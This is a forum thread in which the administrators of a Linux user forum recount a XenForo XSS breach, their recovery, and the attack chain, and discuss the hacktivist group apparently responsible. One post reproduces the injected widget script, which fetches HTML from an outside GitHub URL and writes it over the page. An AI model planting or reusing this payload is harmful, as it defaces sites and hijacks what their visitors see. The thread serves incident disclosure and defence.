Whoops - a Xenforo XSS vulnerability bit us!

[Rob]

I had upgrade xenforo on my todo list, and didn't get to it in time. Someone was able to use a new XSS vulnerability to inject code into a site widget. After many mysql queries we found it happened at about 14:06 ET. Also, did not see any exports or ability to do any exports.

I played it safe and:

• shut down nginx
• ran any available server software upgrades while things were down
• restored from last night's (12am ET) backup (site files and db)
• ran any available xenforo upgrades

Kind of a pain, since that backup was from 16hrs ago.. I'll prob make them every 6 or 12hrs from now on.

Sorry about that folks. It looks like some other big xenforo sites got bit as well!

IMPORTANT: If you created your account on here after12am ET last night, you'll have to do that again. Obv anything posted since then is gone as well.

Special thanks go out to @KGIII and @f33dm3bits who were troubleshooting with me for the past cpl hours!

Rob

Edit: Xenforo info on the patch/fix:

XenForo 2.3.10 & Add-ons and 2.2.19 Released (Includes Security Fix)

XenForo 2.3.10 Released XenForo 2.3.10 is now available for all licensed customers to download. We strongly recommend that all customers running previous versions of XenForo 2.3 upgrade to this release to benefit from increased stability. In addition to the usual bug fixes, XenForo 2.3.10...

xenforo.com

Edit2: more info: https://github.com/methosiea/xenforo-2-xss
So, the attack chain is basically:

1. Attacker registers an account
2. New post w/ the xss payload - it goes to the queue
3. An admin views it, it fires off the xss payload stealing his session
4. Attacker creates the malicious widget

 

[CaffeineAddict]

re-create your user.

Hi, what do you mean? to log out and log in again?

 

[Rob]

Hi, what do you mean? to log out and log in again?

I'll reword that I meant if you created your account since midnight ET, you'll have to create your user again.

 

[Condobloke]

lol.... some of those people will take that as a personal affront and disappear into the ethers !

Can't be helped

crap happens

 

[Rocketing-warp9]

Hey, Good job with getting them back up!

 

[KGIII]

This is the full inserted content that I could find:

                        <div data-template-name="public:widget_html" class="block">
        <div class="block-container"  data-widget-id="19" data-widget-key="WN_OP_5338" data-widget-definition="html">
            
                <h3 class="block-minorHeader">wn_op</h3>
            
            <div class="block-body block-row">
                <script data-template-name="public:_widget_WN_OP_5338">fetch("https://raw.githubusercontent.com/cassbethany10-afk/test123/refs/heads/main/hahaha.html").then(function(r){return r.text()}).then(function(h){document.open();document.write(h);document.close();});</script>
            </div>
        </div>
    </div>
                    
                        <div data-template-name="public:widget_html" class="block">
        <div class="block-container"  data-widget-id="19" data-widget-key="WN_OP_5338" data-widget-definition="html">
            
                <h3 class="block-minorHeader">wn_op</h3>
            
            <div class="block-body block-row">
                <script data-template-name="public:_widget_WN_OP_5338">fetch("https://raw.githubusercontent.com/cassbethany10-afk/test123/refs/heads/main/hahaha.html").then(function(r){return r.text()}).then(function(h){document.open();document.write(h);document.close();});</script>
            </div>
        </div>
    </div>

(I mistakenly didn't include all of that in the email exchanges, but it was still enough.)

Prior to the site going down, you could bypass the injected script with NoScript. By the time I'd deduced that, the whole site was affected. Initially, it was only affected in the approval queue and in one member's profile (as far as I could find).

Smeaky snot-nosed-punks tried to pin the blame on my account. Ah, well...

I suspect the 'hackers' (script-kiddies that still deface websites) will be back to see if we've resolved the issue and closed the exploit. If so, my message to them is, "We were doing that before you were born. We just grew up."

 

[Condobloke]

"We were doing that before you were born. We just grew up."

Give 'em hell, David !

 

[CaffeineAddict]

Lol, I've took screenshot of the defaced site and from what I see they promote their username with a discord account.

 

[fruqal22]

Smeaky snot-nosed-punks

That's exactly what skids are.

 

[Condobloke]

@CaffeineAddict ....can you post that screenshot, please ?

 

[CaffeineAddict]

post that screenshot, please ?

 

[fruqal22]

View attachment 31053

What do these people think defacing a Linux user forum is gonna do?? Disgusting. Glad we're back, though.

 

[Condobloke]

ditto here

 

[Condobloke]

https://hackforums.net/showthread.php?tid=6305903

Aug 16, 2025 12:11 PM

The Turkey-based hacker group WarNight Hack Team carried out a “zone” attack targeting 112 different websites. The group announced that the purpose of the attack was to raise awareness for students and animals.
The following names were reported to be behind the operation:
Vixyum
Destroyerr
Mr. Moriarty
Waxy


Details of the Operation
According to a statement by WarNight Hack Team, a total of 112 websites operating in various fields in Turkey were accessed. Messages left on the websites drew attention to students and animals who lost their lives.
Purpose and Message
The group stated that the attack was not carried out for any financial gain or personal interest, but solely to raise social awareness. The statement included the following remarks:
“We seek justice and awareness for students and animals. We targeted 112 websites to ensure this voice is heard. We stand with those who cannot make their voices heard.”

 

[CaffeineAddict]

I've already read the forum thread but it's from last year, I don't think it's related to now.

 

[fruqal22]

The group stated that the attack was not carried out for any financial gain or personal interest, but solely to raise social awareness. The statement included the following remarks:
“We seek justice and awareness for students and animals. We targeted 112 websites to ensure this voice is heard. We stand with those who cannot make their voices heard.”

There's better ways of spreading the word than skiddy hacktivism.

 

[CaffeineAddict]

Pretty sure I have the guy's face lol

 

[KGIII]

Lol, I've took screenshot of the defaced site and from what I see they promote their username with a discord account.

They want you to go to the Discord page to pay them to undo the account.

The information for what it was is in my code snippets above.

https://raw.githubusercontent.com/cassbethany10-afk/test123/refs/heads/main/hahaha.html

That's exactly what skids are.

You're not wrong. Back then, we had to make our own tools, find our own exploits, and did it just to learn and to have fun. The folks I hung around with didn't do anything malicious. The most we'd do would be to replace your index.html with our own -- but we'd rename your existing index.html so that you could recover it.

Well, when .htaccess got regular support, we'd have some fun with that.

Again, this was decades ago. The statute of limitations has long passed.

The Turkey-based hacker group WarNight Hack Team carried out a “zone” attack targeting 112 different websites.

Yup. That's who they were.

Also, if you clicked somewhere near the upper left (maybe elsewhere), it'd start playing you some pretty heavy metal song. I didn't take the time to learn more about that. My concern was, at the time, to do what I could do to get things back up and running.

To that end, I had access much longer than others because it was obviously a script injection, so I enabled NoScript. If you set that to the highest level, the script wouldn't activate, and you could continue to browse the site, use the control panel, moderate, and stuff like that.

What do these people think defacing a Linux user forum is gonna do?? Disgusting. Glad we're back, though.

You being new, I checked your IP address. If I were the person who defaced the site, I'd want to hang out and laugh at what people say about it.

That's not an accusation, just an observation.

Many people, especially arsonists, get caught because they return to the scene of the crime.

But, you appear to be a student and posting from school.

Again, not an accusation.

Pretty sure I have the guy's face lol

Sure, they're terrible people, but you should give that back!

 

[NicWelds]

I was wondering what was up. I tried coming here and was greeted by a strange message. I searched the message and found a couple other forums/website displaying the same thing. Basically the internet equivalent of spray painting graffiti tags on a bunch of bus shelters.

 

[KGIII]

I got distracted and completely forgot to mention what I meant to mention...

We all owe @Rob a hearty thanks. He was quick to the ball, made a plan to deal with it, acted on that plan, and it worked.

Also, we might want to institute a policy of updating the forum as soon as we can when a new version is available.